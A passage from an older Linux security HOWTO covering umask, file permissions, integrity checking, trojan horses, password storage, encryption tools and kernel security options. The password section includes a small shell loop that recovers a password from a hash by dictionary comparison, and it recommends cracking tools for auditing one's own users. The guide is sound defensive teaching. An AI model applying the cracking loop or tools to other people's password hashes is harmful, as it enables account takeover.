Example 2: file, default 6, binary: 110; mask, e.g. 6: 110, NOT: 001
           resulting permission, AND: 000 (equals 0, ___)
Example 3: directory, default 7, binary: 111; mask, e.g. 2: 010, NOT: 101
           resulting permission, AND: 101 (equals 5, r_x)
Example 4: directory, default 7, binary: 111; mask, e.g. 6: 110, NOT: 001
           resulting permission, AND: 001 (equals 1, __x)
# Set the user's default umask
umask 033
Be sure to make root's umask 077, which will disable read, write, and execute
permission for other users, unless explicitly changed using chmod. With the
033 umask shown above, newly-created directories would have 744 permissions,
obtained by subtracting 033 from 777, and newly-created files would have
permissions of 644.
If you are using Red Hat, and adhere to their user and group ID creation
scheme (User Private Groups), it is only necessary to use 002 for a umask.
This is due to the fact that the default configuration is one user per group.
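The calculation above can be checked directly at the shell; this sketch
creates a throw-away file in a scratch directory:

```shell
# A file is created with mode 666 AND NOT(umask): 666 & ~027 = 640.
cd "$(mktemp -d)"
umask 027
touch demo-file
ls -l demo-file        # mode field reads -rw-r-----
```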
-----------------------------------------------------------------------------
5.2. File Permissions
It's important to ensure that your system files are not open for casual
editing by users and groups who shouldn't be doing such system maintenance.
Unix separates access control on files and directories according to three
characteristics: owner, group, and other. There is always exactly one owner,
any number of members of the group, and everyone else.
A quick explanation of Unix permissions:
Ownership - Which user(s) and group(s) retain(s) control of the permission
settings of the node and parent of the node
Permissions - Bits capable of being set or reset to allow certain types of
access to it. Permissions for directories may have a different meaning than
the same set of permissions on files.
Read:
  * To be able to view contents of a file
  * To be able to read a directory
Write:
  * To be able to add to or change a file
  * To be able to delete or move files in a directory
Execute:
  * To be able to run a binary program or shell script
  * To be able to search in a directory, combined with read permission
Save Text Attribute: (For directories)
The "sticky bit" also has a different meaning when applied to
directories than when applied to files. If the sticky bit is set on a
directory, then a user may only delete files that he owns or for
which he has explicit write permission granted, even when he has write
access to the directory. This is designed for directories like /tmp,
which are world-writable, but where it may not be desirable to allow any
user to delete files at will. The sticky bit is seen as a t in a long
directory listing.
SUID Attribute: (For Files)
This describes set-user-id permissions on the file. When the set user ID
access mode is set in the owner permissions, and the file is executable,
processes which run it are granted access to system resources based on the
user who owns the file, as opposed to the user who created the process.
This is why many "buffer overflow" exploits target SUID programs.
SGID Attribute: (For Files)
If set in the group permissions, this bit controls the "set group id"
status of a file. This behaves the same way as SUID, except the group is
affected instead. The file must be executable for this to have any
effect.
SGID Attribute: (For directories)
If you set the SGID bit on a directory (with chmod g+s directory), files
created in that directory will have their group set to the directory's
group.
You - The owner of the file
Group - The group you belong to
Everyone - Anyone on the system that is not the owner or a member of the
group
File Example:
-rw-r--r-- 1 kevin users 114 Aug 28 1997 .zlogin
1st bit - directory? (no)
2nd bit - read by owner? (yes, by kevin)
3rd bit - write by owner? (yes, by kevin)
4th bit - execute by owner? (no)
5th bit - read by group? (yes, by users)
6th bit - write by group? (no)
7th bit - execute by group? (no)
8th bit - read by everyone? (yes, by everyone)
9th bit - write by everyone? (no)
10th bit - execute by everyone? (no)
The following lines are examples of the minimum sets of permissions that are
required to perform the access described. You may want to give more
permission than what's listed here, but this should describe what these
minimum permissions on files do:
-r-------- Allow read access to the file by owner
--w------- Allows the owner to modify or delete the file
(Note that anyone with write permission to the directory
the file is in can overwrite it and thus delete it)
---x------ The owner can execute this program, but not shell scripts,
which still need read permission
---s------ Will execute with effective User ID = to owner
--------s- Will execute with effective Group ID = to group
-rw------T No update of "last modified time". Usually used for swap
files
---t------ No effect. (formerly sticky bit)
Directory Example:
drwxr-xr-x 3 kevin users 512 Sep 19 13:47 .public_html/
1st bit - directory? (yes, it contains many files)
2nd bit - read by owner? (yes, by kevin)
3rd bit - write by owner? (yes, by kevin)
4th bit - execute by owner? (yes, by kevin)
5th bit - read by group? (yes, by users)
6th bit - write by group? (no)
7th bit - execute by group? (yes, by users)
8th bit - read by everyone? (yes, by everyone)
9th bit - write by everyone? (no)
10th bit - execute by everyone? (yes, by everyone)
The following lines are examples of the minimum sets of permissions that are
required to perform the access described. You may want to give more
permission than what's listed, but this should describe what these minimum
permissions on directories do:
dr-------- The contents can be listed, but file attributes can't be read
d--x------ The directory can be entered, and used in full execution paths
dr-x------ File attributes can be read by owner
d-wx------ Files can be created/deleted, even if the directory
isn't the current one
d------x-t Prevents files from deletion by others with write
access. Used on /tmp
d---s--s-- No effect
System configuration files (usually in /etc) are usually mode 640
(-rw-r-----), and owned by root. Depending on your site's security
requirements, you might adjust this. Never leave any system files writable by
a group or everyone. Some configuration files, including /etc/shadow, should
only be readable by root, and directories in /etc should at least not be
accessible by others.
SUID Shell Scripts
SUID shell scripts are a serious security risk, and for this reason the
kernel will not honor them. Regardless of how secure you think the shell
script is, it can be exploited to give the cracker a root shell.
-----------------------------------------------------------------------------
5.3. Integrity Checking
Another very good way to detect local (and also network) attacks on your
system is to run an integrity checker like Tripwire, Aide or Osiris. These
integrity checkers compute a number of checksums on all your important
binaries and config files and compare them against a database of former,
known-good values as a reference. Thus, any changes in the files will be
flagged.
It's a good idea to install these sorts of programs onto a floppy, and then
physically set the write protect on the floppy. This way intruders can't
tamper with the integrity checker itself or change the database. Once you
have something like this set up, it's a good idea to run it as part of your
normal security administration duties to see if anything has changed.
You can even add a crontab entry to run the checker from your floppy every
night and mail you the results in the morning. Something like:
# set mailto
MAILTO=kevin
# run Tripwire
15 05 * * * root /usr/local/adm/tcheck/tripwire
will mail you a report each morning at 5:15am.
Integrity checkers can be a godsend for detecting intruders before you would
otherwise notice them. Since a lot of files change on the average system, you
have to be careful to distinguish cracker activity from your own doing.
You can find the freely available, unsupported version of Tripwire at
[http://www.tripwire.org] http://www.tripwire.org. Manuals and support can
be purchased.
Aide can be found at [http://www.cs.tut.fi/~rammer/aide.html] http://
www.cs.tut.fi/~rammer/aide.html.
Osiris can be found at [http://www.shmoo.com/osiris/] http://www.shmoo.com/
osiris/.
-----------------------------------------------------------------------------
5.4. Trojan Horses
"Trojan Horses" are named after the fabled ploy in Virgil's "Aeneid". The
idea is that a cracker distributes a program or binary that sounds great, and
encourages other people to download it and run it as root. Then the program
can compromise their system while they are not paying attention. While they
think the binary they just pulled down does one thing (and it might very
well), it also compromises their security.
You should take care about which programs you install on your machine. Red
Hat provides MD5 checksums and PGP signatures on its RPM files so you can
verify you are installing the real thing. Other distributions have similar
methods.
You should never run any unfamiliar binary, for which you don't have the
source, as root. Few attackers are willing to release source code to public
scrutiny.
Although it can be complex, make sure you are getting the source for a
program from its real distribution site. If the program is going to run as
root, make sure either you or someone you trust has looked over the source
and verified it.
-----------------------------------------------------------------------------
6. Password Security and Encryption
One of the most important security features used today is the password. It
is important for both you and all your users to have secure, unguessable
passwords. Most of the more recent Linux distributions include passwd
programs that do not allow you to set an easily guessable password. Make sure
your passwd program is up to date and has these features.
In-depth discussion of encryption is beyond the scope of this document, but
an introduction is in order. Encryption is very useful, possibly even
necessary in this day and age. There are all sorts of methods of encrypting
data, each with its own set of characteristics.
Most Unices (and Linux is no exception) primarily use a one-way encryption
algorithm, called DES (Data Encryption Standard), to encrypt your passwords.
This encrypted password is then stored, typically, in /etc/passwd or, less
commonly, /etc/shadow. When you attempt to login, the password you type in is
encrypted again and compared with the entry in the file that stores your
passwords. If they match, it must be the same password, and you are allowed
access. Although DES is a two-way encryption algorithm (you can code and then
decode a message, given the right keys), the variant that most Unixes use is
one-way. This means that it should not be possible to reverse the encryption
to get the password from the contents of /etc/passwd (or /etc/shadow).
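The encrypt-and-compare scheme described above can be illustrated at the
shell. This sketch uses md5sum purely as a stand-in for the one-way function;
the real check uses the C library's crypt() routine, but the comparison logic
is the same:

```shell
# One-way password checking: store only a hash, never the password itself.
stored=$(printf '%s' "secret" | md5sum | cut -d' ' -f1)    # set at passwd time

typed="secret"                                             # entered at login
attempt=$(printf '%s' "$typed" | md5sum | cut -d' ' -f1)

# The stored hash cannot be reversed, but matching hashes imply a match.
if [ "$attempt" = "$stored" ]; then
    echo "access granted"
else
    echo "access denied"
fi
```

Running this prints "access granted"; change `typed` to anything else and the
hashes no longer match.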
Brute force attack programs, such as "Crack" or "John the Ripper" (see
Section 6.9), can often guess passwords unless your password is sufficiently
random. PAM modules (see below) allow you to use a different encryption
routine with your passwords (MD5 or the like). You can use Crack to your
advantage, as well. Consider periodically running Crack against your own
password database, to find insecure passwords. Then contact the offending
user, and instruct him to change his password.
You can go to [http://consult.cern.ch/writeup/security/security_3.html]
http://consult.cern.ch/writeup/security/security_3.html for information on
how to choose a good password.
-----------------------------------------------------------------------------
6.1. PGP and Public-Key Cryptography
Public-key cryptography, such as that used for PGP, uses one key for
encryption, and one key for decryption. Traditional cryptography, however,
uses the same key for encryption and decryption; this key must be known to
both parties, and thus somehow transferred from one to the other securely.
To alleviate the need to securely transmit the encryption key, public-key
encryption uses two separate keys: a public key and a private key. Each
person's public key is available to anyone for encryption, while at the
same time each person keeps his or her private key to decrypt messages
encrypted with the correct public key.
There are advantages to both public key and private key cryptography, and
you can read about those differences in [http://www.rsa.com/rsalabs/faq/] the
RSA Cryptography FAQ, listed at the end of this section.
PGP (Pretty Good Privacy) is well-supported on Linux. Versions 2.6.2 and 5.0
are known to work well. For a good primer on PGP and how to use it, take a
look at the PGP FAQ: [http://www.pgp.com/service/export/faq/55faq.cgi] http:/
/www.pgp.com/service/export/faq/55faq.cgi
Be sure to use the version that is applicable to your country. Due to export
restrictions by the US Government, strong encryption is prohibited from being
transferred in electronic form outside the country.
US export controls are now managed by EAR (Export Administration
Regulations). They are no longer governed by ITAR.
There is also a step-by-step guide for configuring PGP on Linux available at
[http://mercury.chem.pitt.edu/~angel/LinuxFocus/English/November1997/
article7.html] http://mercury.chem.pitt.edu/~angel/LinuxFocus/English/
November1997/article7.html. It was written for the international version of
PGP, but is easily adaptable to the United States version. You may also need
a patch for some of the latest versions of Linux; the patch is available at
[ftp://metalab.unc.edu/pub/Linux/apps/crypto] ftp://metalab.unc.edu/pub/Linux
/apps/crypto.
There is a project maintaining a free, open-source re-implementation of PGP.
GnuPG is a complete and free replacement for PGP. Because it does not
use IDEA or RSA, it can be used without any restrictions. GnuPG is in
compliance with [http://www.faqs.org/rfcs/rfc2440.html] OpenPGP. See the GNU
Privacy Guard web page for more information: [http://www.gnupg.org] http://
www.gnupg.org/.
More information on cryptography can be found in the RSA cryptography FAQ,
available at [http://www.rsa.com/rsalabs/newfaq/] http://www.rsa.com/rsalabs/
newfaq/. Here you will find information on such terms as "Diffie-Hellman",
"public-key cryptography", "digital certificates", etc.
-----------------------------------------------------------------------------
6.2. SSL, S-HTTP and S/MIME
Often users ask about the differences between the various security and
encryption protocols, and how to use them. While this isn't an encryption
document, it is a good idea to explain briefly what each protocol is, and
where to find more information.
  * SSL: - SSL, or Secure Sockets Layer, is an encryption method developed
    by Netscape to provide security over the Internet. It supports several
    different encryption protocols, and provides client and server
    authentication. SSL operates at the transport layer, creates a secure
    encrypted channel of data, and thus can seamlessly encrypt data of many
    types. This is most commonly seen when going to a secure site to view a
    secure online document with Communicator, and serves as the basis for
    secure communications with Communicator, as well as many other Netscape
    Communications data encryption. More information can be found at [http://
    www.consensus.com/security/ssl-talk-faq.html] http://www.consensus.com/
    security/ssl-talk-faq.html. Information on Netscape's other security
    implementations, and a good starting point for these protocols, is
    available at [http://home.netscape.com/info/security-doc.html] http://
    home.netscape.com/info/security-doc.html. It's also worth noting that the
    SSL protocol can be used to pass many other common protocols, "wrapping"
    them for security. See [http://www.quiltaholic.com/rickk/sslwrap/] http:/
    /www.quiltaholic.com/rickk/sslwrap/
  * S-HTTP: - S-HTTP is another protocol that provides security services
    across the Internet. It was designed to provide confidentiality,
    authentication, integrity, and non-repudiability [cannot be mistaken for
    someone else] while supporting multiple key-management mechanisms and
    cryptographic algorithms via option negotiation between the parties
    involved in each transaction. S-HTTP is limited to the specific software
    that is implementing it, and encrypts each message individually. [From
    RSA Cryptography FAQ, page 138]
  * S/MIME: - S/MIME, or Secure Multipurpose Internet Mail Extension, is an
    encryption standard used to encrypt electronic mail and other types of
    messages on the Internet. It is an open standard developed by RSA, so it
    is likely we will see it on Linux one day soon. More information on
    S/MIME can be found at [http://home.netscape.com/assist/security/smime/
    overview.html] http://home.netscape.com/assist/security/smime/
    overview.html.
-----------------------------------------------------------------------------
6.3. Linux IPSEC Implementations
Along with CIPE, and other forms of data encryption, there are also several
other implementations of IPSEC for Linux. IPSEC is an effort by the IETF to
create cryptographically-secure communications at the IP network level, and
to provide authentication, integrity, access control, and confidentiality.
Information on IPSEC and Internet draft can be found at [http://www.ietf.org/
html.charters/ipsec-charter.html] http://www.ietf.org/html.charters/
ipsec-charter.html. You can also find links to other protocols involving key
management, and an IPSEC mailing list and archives.
The x-kernel Linux implementation, which is being developed at the
University of Arizona, uses an object-based framework for implementing
network protocols called x-kernel, and can be found at [http://
www.cs.arizona.edu/xkernel/hpcc-blue/linux.html] http://www.cs.arizona.edu/
xkernel/hpcc-blue/linux.html. Most simply, the x-kernel is a method of
passing messages at the kernel level, which makes for an easier
implementation.
Another freely-available IPSEC implementation is the Linux FreeS/WAN IPSEC.
Their web page states, "These services allow you to build secure tunnels
through untrusted networks. Everything passing through the untrusted net is
encrypted by the IPSEC gateway machine and decrypted by the gateway at the
other end. The result is a Virtual Private Network or VPN. This is a network
which is effectively private even though it includes machines at several
different sites connected by the insecure Internet."
It's available for download from [http://www.xs4all.nl/~freeswan/] http://
www.xs4all.nl/~freeswan/, and has just reached 1.0 at the time of this
writing.
As with other forms of cryptography, it is not distributed with the kernel
by default due to export restrictions.
-----------------------------------------------------------------------------
6.4. ssh (Secure Shell) and stelnet
ssh and stelnet are suites of programs that allow you to login to remote
systems and have an encrypted connection.
openssh is a suite of programs used as a secure replacement for rlogin, rsh
and rcp. It uses public-key cryptography to encrypt communications between
two hosts, as well as to authenticate users. It can be used to securely login
to a remote host or copy data between hosts, while preventing
man-in-the-middle attacks (session hijacking) and DNS spoofing. It will
perform data compression on your connections, and secure X11 communications
between hosts.
There are several ssh implementations now. The original commercial
implementation by Data Fellows can be found at the ssh home page: [http://
www.datafellows.com] http://www.datafellows.com.
The excellent OpenSSH implementation is based on an early version of the
Data Fellows ssh and has been totally reworked to not include any patented or
proprietary pieces. It is free and under a BSD license. It can be found at:
[http://www.openssh.com] http://www.openssh.com.
There is also an open source project to re-implement ssh from the ground up
called "psst...". For more information see: [http://www.net.lut.ac.uk/psst/]
http://www.net.lut.ac.uk/psst/
You can also use ssh from your Windows workstation to your Linux ssh server.
There are several freely available Windows client implementations, including
the one at [http://guardian.htu.tuwien.ac.at/therapy/ssh/] http://
guardian.htu.tuwien.ac.at/therapy/ssh/ as well as a commercial implementation
from DataFellows, at [http://www.datafellows.com] http://www.datafellows.com.
SSLeay is a free implementation of Netscape's Secure Sockets Layer protocol,
developed by Eric Young. It includes several applications, such as Secure
telnet, a module for Apache, several databases, as well as several algorithms
including DES, IDEA and Blowfish.
Using this library, a secure telnet replacement has been created that does
encryption over a telnet connection. Unlike SSH, stelnet uses SSL, the Secure
Sockets Layer protocol developed by Netscape. You can find Secure telnet and
Secure FTP by starting with the SSLeay FAQ, available at [http://
www.psy.uq.oz.au/~ftp/Crypto/] http://www.psy.uq.oz.au/~ftp/Crypto/.
SRP is another secure telnet/ftp implementation. From their web page:
"The SRP project is developing secure Internet software for free worldwide
use. Starting with a fully-secure Telnet and FTP distribution, we hope to
supplant weak networked authentication systems with strong replacements that
do not sacrifice user-friendliness for security. Security should be the
default, not an option!"
For more information, go to [http://www-cs-students.stanford.edu/~tjw/srp/]
http://www-cs-students.stanford.edu/~tjw/srp/
-----------------------------------------------------------------------------
6.5. PAM - Pluggable Authentication Modules
Newer versions of the Red Hat Linux and Debian Linux distributions ship with
a unified authentication scheme called "PAM". PAM allows you to change your
authentication methods and requirements on the fly, and encapsulate all local
authentication methods without recompiling any of your binaries.
Configuration of PAM is beyond the scope of this document, but be sure to
take a look at the PAM web site for more information. [http://www.kernel.org/
pub/linux/libs/pam/index.html] http://www.kernel.org/pub/linux/libs/pam/
index.html.
Just a few of the things you can do with PAM:
  * Use encryption other than DES for your passwords (making them harder to
brute-force decode)
  * Set resource limits on all your users so they can't perform
denial-of-service attacks (number of processes, amount of memory, etc.)
  * Enable shadow passwords (see below) on the fly
  * Allow specific users to login only at specific times from specific
places
Within a few hours of installing and configuring your system, you can
prevent many attacks before they even occur. For example, use PAM to disable
the system-wide usage of .rhosts files in users' home directories by adding
these lines to /etc/pam.d/rlogin:
#
# Disable rsh/rlogin/rexec for users
#
auth     required     pam_rhosts_auth.so no_rhosts
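The resource-limits item mentioned above is typically handled by the pam_limits module, which reads /etc/security/limits.conf. A minimal sketch follows; the group and account names here are invented for the example:

```
# /etc/security/limits.conf -- read by the pam_limits module
# <domain>   <type>  <item>      <value>
@users       hard    nproc       50    # no more than 50 processes each
@users       hard    maxlogins   4     # at most 4 simultaneous logins
guest        hard    cpu         10    # hypothetical guest account: 10 CPU minutes
```

For the limits to take effect, the service's file in /etc/pam.d/ also needs a line such as "session required pam_limits.so".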
-----------------------------------------------------------------------------
6.6. Cryptographic IP Encapsulation (CIPE)
The primary goal of this software is to provide a facility for secure
(against eavesdropping, including traffic analysis, and faked message
injection) subnetwork interconnection across an insecure packet network such
as the Internet.
CIPE encrypts the data at the network level. Packets traveling between hosts
on the network are encrypted. The encryption engine is placed near the driver
which sends and receives packets.
This is unlike SSH, which encrypts the data by connection, at the socket
level. A logical connection between programs running on different hosts is
encrypted.
CIPE can be used in tunnelling, in order to create a Virtual Private
Network. Low-level encryption has the advantage that it can be made to work
transparently between the two networks connected in the VPN, without any
change to application software.
Summarized from the CIPE documentation:
"The IPSEC standards define a set of protocols which can be used (among
other things) to build encrypted VPNs. However, IPSEC is a rather heavyweight
and complicated protocol set with a lot of options, implementations of the
full protocol set are still rarely used and some issues (such as key
management) are still not fully resolved. CIPE uses a simpler approach, in
which many things which can be parameterized (such as the choice of the
actual encryption algorithm used) are an install-time fixed choice. This
limits flexibility, but allows for a simple (and therefore efficient, easy to
debug...) implementation."
Further information can be found at [http://www.inka.de/~bigred/devel/
cipe.html] http://www.inka.de/~bigred/devel/cipe.html
As with other forms of cryptography, it is not distributed with the kernel
by default due to export restrictions.
-----------------------------------------------------------------------------
6.7. Kerberos
Kerberos is an authentication system developed by the Athena Project at MIT.
When a user logs in, Kerberos authenticates that user (using a password), and
provides the user with a way to prove her identity to other servers and hosts
scattered around the network.
This authentication is then used by programs such as rlogin to allow the
user to login to other hosts without a password (in place of the .rhosts
file). This authentication method can also be used by the mail system in order
to guarantee that mail is delivered to the correct person, as well as to
guarantee that the sender is who he claims to be.
Kerberos and the other programs that come with it prevent users from
"spoofing" the system into believing they are someone else. Unfortunately,
installing Kerberos is very intrusive, requiring the modification or
replacement of numerous standard programs.
You can find more information about Kerberos by looking at [http://
www.cis.ohio-state.edu/hypertext/faq/usenet/kerberos-faq/general/faq.html]
the Kerberos FAQ, and the code can be found at [http://nii.isi.edu/info/
kerberos/] http://nii.isi.edu/info/kerberos/.
[From: Steiner, Jennifer G., Clifford Neuman, and Jeffrey I. Schiller.
"Kerberos: An Authentication Service for Open Network Systems." USENIX
Conference Proceedings, Dallas, Texas, Winter 1988.]
Kerberos should not be your first step in improving security of your host.
It is quite involved, and not as widely used as, say, SSH.
-----------------------------------------------------------------------------
6.8. Shadow Passwords.
Shadow passwords are a means of keeping your encrypted password information
secret from normal users. Recent versions of both Red Hat and Debian Linux
use shadow passwords by default, but on other systems, encrypted passwords
are stored in the /etc/passwd file for all to read. Anyone can then run
password-guesser programs on them and attempt to determine what they are.
Shadow passwords, by contrast, are saved in /etc/shadow, which only
privileged users can read. In order to use shadow passwords, you need to make
sure all your utilities that need access to password information are
recompiled to support them. PAM (above) also allows you to just plug in a
shadow module; it doesn't require re-compilation of executables. You can
refer to the Shadow-Password HOWTO for further information if necessary. It
is available at [http://metalab.unc.edu/LDP/HOWTO/Shadow-Password-HOWTO.html]
http://metalab.unc.edu/LDP/HOWTO/Shadow-Password-HOWTO.html. It is rather
dated now, and will not be required for distributions supporting PAM.
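A quick way to check where your password hashes actually live is to inspect the second field of each /etc/passwd entry. This is only a sketch; locked or system accounts may show "*" or "!" rather than "x":

```shell
# Print any account whose password hash is still in world-readable /etc/passwd;
# on a properly shadowed system the second field is just "x" (or "*"/"!" for
# locked accounts) and the real hashes live in root-only /etc/shadow
awk -F: '$2 != "x" && $2 != "*" && $2 != "!" {print $1}' /etc/passwd
```

If this prints nothing, your hashes are already out of /etc/passwd.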
-----------------------------------------------------------------------------
6.9. "Crack" and "John the Ripper"
If for some reason your passwd program is not enforcing hard-to-guess
passwords, you might want to run a password-cracking program and make sure
your users' passwords are secure.
Password cracking programs work on a simple idea: they try every word in the
dictionary, and then variations on those words, encrypting each one and
checking it against your encrypted password. If they get a match they know
what your password is.
There are a number of such programs; the two most notable are
"Crack" and "John the Ripper" ([http://www.openwall.com/john/] http://
www.openwall.com/john/). They will take up a lot of your CPU time, but you
should be able to tell if an attacker could get in using them by running them
first yourself and notifying users with weak passwords. Note that an attacker
would have to use some other hole first in order to read your /etc/passwd
file, but such holes are more common than you might think.
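The core idea can be sketched in a few lines of shell. The word list, salt, and "stolen" hash below are all invented for the illustration, with openssl's MD5-crypt mode standing in for whatever hash your passwd program uses:

```shell
# Stand-in for a hash lifted from a password file (MD5-crypt, salt "xy")
target=$(openssl passwd -1 -salt xy secret)

# Hash each dictionary word with the same salt and compare against the target
for word in password letmein dragon secret; do
    if [ "$(openssl passwd -1 -salt xy "$word")" = "$target" ]; then
        echo "cracked: $word"
    fi
done
# prints "cracked: secret"
```

Real crackers apply the same loop to millions of words plus mutations (case changes, appended digits, and so on), which is why dictionary-derived passwords fall quickly.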
Because security is only as strong as the most insecure host, it is worth
mentioning that if you have any Windows machines on your network, you should
check out L0phtCrack, a Crack implementation for Windows. It's available from
[http://www.l0pht.com] http://www.l0pht.com
-----------------------------------------------------------------------------
6.10. CFS - Cryptographic File System and TCFS - Transparent Cryptographic
File System
CFS is a way of encrypting entire directory trees and allowing users to
store encrypted files on them. It uses an NFS server running on the local
machine. RPMS are available at [http://www.zedz.net/redhat/] http://
www.zedz.net/redhat/, and more information on how it all works is at [ftp://
ftp.research.att.com/dist/mab/] ftp://ftp.research.att.com/dist/mab/.
TCFS improves on CFS by adding more integration with the file system, so
that it's transparent to users that the file system is encrypted. More
information at: [http://www.tcfs.it/] http://www.tcfs.it/.
It also need not be used on entire file systems; it works on directory trees
as well.
-----------------------------------------------------------------------------
6.11. X11, SVGA and display security
6.11.1. X11
It's important for you to secure your graphical display to prevent attackers
from grabbing your passwords as you type them, reading documents or
information you are reading on your screen, or even using a hole to gain root
access. Running remote X applications over a network also can be fraught with
peril, allowing sniffers to see all your interaction with the remote system.
X has a number of access-control mechanisms. The simplest of them is
host-based: you use xhost to specify the hosts that are allowed access to
your display. This is not very secure at all, because if someone has access
to your machine, they can xhost + their machine and get in easily. Also, if
you have to allow access from an untrusted machine, anyone there can
compromise your display.
When using xdm (X Display Manager) to log in, you get a much better access
method: MIT-MAGIC-COOKIE-1. A 128-bit "cookie" is generated and stored in
your .Xauthority file. If you need to allow a remote machine access to your
display, you can use the xauth command and the information in your
.Xauthority file to provide access to only that connection. See the
Remote-X-Apps mini-howto, available at [http://metalab.unc.edu/LDP/HOWTO/mini
/Remote-X-Apps.html] http://metalab.unc.edu/LDP/HOWTO/mini/
Remote-X-Apps.html.
You can also use ssh (see Section 6.4, above) to allow secure X connections.
This has the advantage of also being transparent to the end user, and means
that no unencrypted data flows across the network.
You can also disable any remote connections to your X server by using the
'-nolisten tcp' option to your X server. This will prevent any network
connections to your server over tcp sockets.
Take a look at the Xsecurity man page for more information on X security.
The safe bet is to use xdm to login to your console and then use ssh to go to
remote sites on which you wish to run X programs.
-----------------------------------------------------------------------------
6.11.2. SVGA
SVGAlib programs are typically SUID-root in order to access all your Linux
machine's video hardware. This makes them very dangerous. If they crash, you
typically need to reboot your machine to get a usable console back. Make sure
any SVGA programs you are running are authentic, and can at least be somewhat
trusted. Even better, don't run them at all.
-----------------------------------------------------------------------------
6.11.3. GGI (Generic Graphics Interface project)
The Linux GGI project is trying to solve several of the problems with video
interfaces on Linux. GGI will move a small piece of the video code into the
Linux kernel, and then control access to the video system. This means GGI
will be able to restore your console at any time to a known good state. They
will also allow a secure attention key, so you can be sure that there is no
Trojan horse login program running on your console. [http://
synergy.caltech.edu/~ggi/] http://synergy.caltech.edu/~ggi/
-----------------------------------------------------------------------------
7. Kernel Security
This is a description of the kernel configuration options that relate to
security, and an explanation of what they do, and how to use them.
As the kernel controls your computer's networking, it is important that it
be very secure, and not be compromised. To prevent some of the latest
networking attacks, you should try to keep your kernel version current. You
can find new kernels at [ftp://ftp.kernel.org] ftp://ftp.kernel.org or from
your distribution vendor.
There is also an international group providing a single unified crypto patch
to the mainstream Linux kernel. This patch provides support for a number of
cryptographic subsystems and things that cannot be included in the mainstream
kernel due to export restrictions. For more information, visit their web page
at: [http://www.kerneli.org] http://www.kerneli.org
-----------------------------------------------------------------------------
7.1. 2.0 Kernel Compile Options
For 2.0.x kernels, the following options apply. You should see these options
during the kernel configuration process. Many of the comments here are from
./linux/Documentation/Configure.help, which is the same document that is
referenced while using the Help facility during the make config stage of
compiling the kernel.
  * Network Firewalls (CONFIG_FIREWALL)
This option should be on if you intend to run any firewalling or
masquerading on your Linux machine. If it's just going to be a regular
client machine, it's safe to say no.
  * IP: forwarding/gatewaying (CONFIG_IP_FORWARD)
If you enable IP forwarding, your Linux box essentially becomes a
router. If your machine is on a network, you could be forwarding data
from one network to another, and perhaps subverting a firewall that was
put there to prevent this from happening. Normal dial-up users will want
to disable this, and other users should concentrate on the security
implications of doing this. Firewall machines will want this enabled, and
used in conjunction with firewall software.
You can enable IP forwarding dynamically using the following command:
root# echo 1 > /proc/sys/net/ipv4/ip_forward
and disable it with the command:
root# echo 0 > /proc/sys/net/ipv4/ip_forward
Keep in mind that the files in /proc are "virtual" files and the shown size of
the file might not reflect the data output from it.
  * IP: syn cookies (CONFIG_SYN_COOKIES)
A "SYN Attack" is a denial of service (DoS) attack that consumes all the
resources on your machine, forcing you to reboot. We can't think of a
reason you wouldn't normally enable this. In the 2.2.x kernel series this
config option merely allows syn cookies, but does not enable them. To
enable them, you have to do:
root# echo 1 > /proc/sys/net/ipv4/tcp_syncookies
  * IP: Firewalling (CONFIG_IP_FIREWALL)
This option is necessary if you are going to configure your machine as a
firewall, do masquerading, or wish to protect your dial-up workstation
from someone entering via your PPP dial-up interface.
  * IP: firewall packet logging (CONFIG_IP_FIREWALL_VERBOSE)
This option gives you information about packets your firewall received,
like sender, recipient, port, etc.
  * IP: Drop source routed frames (CONFIG_IP_NOSR)
This option should be enabled. Source routed frames contain the entire
path to their destination inside of the packet. This means that routers
through which the packet goes do not need to inspect it, and just forward
it on. This could lead to data entering your system that may be a
potential exploit.
  * IP: masquerading (CONFIG_IP_MASQUERADE) If one of the computers on your
local network for which your Linux box acts as a firewall wants to send
something to the outside, your box can "masquerade" as that host, i.e.,
it forwards the traffic to the intended destination, but makes it look
like it came from the firewall box itself. See [http://www.indyramp.com/
masq] http://www.indyramp.com/masq for more information.
  * IP: ICMP masquerading (CONFIG_IP_MASQUERADE_ICMP) This option adds ICMP
masquerading to the previous option of only masquerading TCP or UDP
traffic.
  * IP: transparent proxy support (CONFIG_IP_TRANSPARENT_PROXY) This enables
your Linux firewall to transparently redirect any network traffic
originating from the local network and destined for a remote host to a
local server, called a "transparent proxy server". This makes the local
computers think they are talking to the remote end, while in fact they
are connected to the local proxy. See the IP-Masquerading HOWTO and
[http://www.indyramp.com/masq] http://www.indyramp.com/masq for more
information.
  * IP: always defragment (CONFIG_IP_ALWAYS_DEFRAG)
Generally this option is disabled, but if you are building a firewall or
a masquerading host, you will want to enable it. When data is sent from
one host to another, it does not always get sent as a single packet of
data, but rather it is fragmented into several pieces. The problem with
this is that the port numbers are only stored in the first fragment. This
means that someone can insert information into the remaining packets that
isn't supposed to be there. It could also prevent a teardrop attack
against an internal host that is not yet itself patched against it.
  * Packet Signatures (CONFIG_NCPFS_PACKET_SIGNING)
This is an option that is available in the 2.2.x kernel series that will
sign NCP packets for stronger security. Normally you can leave it off,
but it is there if you do need it.
  * IP: Firewall packet netlink device (CONFIG_IP_FIREWALL_NETLINK)
This is a really neat option that allows you to analyze the first 128
bytes of the packets in a user-space program, to determine if you would
like to accept or deny the packet, based on its validity.
-----------------------------------------------------------------------------
7.2. 2.2 Kernel Compile Options
For 2.2.x kernels, many of the options are the same, but a few new ones have
been developed. Many of the comments here are from ./linux/Documentation/
Configure.help, which is the same document that is referenced while using the
Help facility during the make config stage of compiling the kernel. Only the
newly-added options are listed below. Consult the 2.0 description for a list
of other necessary options. The most significant change in the 2.2 kernel
series is the IP firewalling code. The ipchains program is now used to
install IP firewalling, instead of the ipfwadm program used in the 2.0
kernel.
  * Socket Filtering (CONFIG_FILTER)
For most people, it's safe to say no to this option. This option allows
you to connect a user-space filter to any socket and determine if packets
should be allowed or denied. Unless you have a very specific need and are
capable of programming such a filter, you should say no. Also note that
as of this writing, all protocols were supported except TCP.
  * Port Forwarding
Port Forwarding is an addition to IP Masquerading which allows some
forwarding of packets from outside to inside a firewall on given ports.
This could be useful if, for example, you want to run a web server behind
the firewall or masquerading host and that web server should be
accessible from the outside world. An external client sends a request to
port 80 of the firewall, the firewall forwards this request to the web
server, the web server handles the request and the results are sent
through the firewall to the original client. The client thinks that the
firewall machine itself is running the web server. This can also be used
for load balancing if you have a farm of identical web servers behind the
firewall.
Information about this feature is available from http://
www.monmouth.demon.co.uk/ipsubs/portforwarding.html (to browse the WWW,
you need to have access to a machine on the Internet that has a program
like lynx or Netscape). For general info, please see ftp://
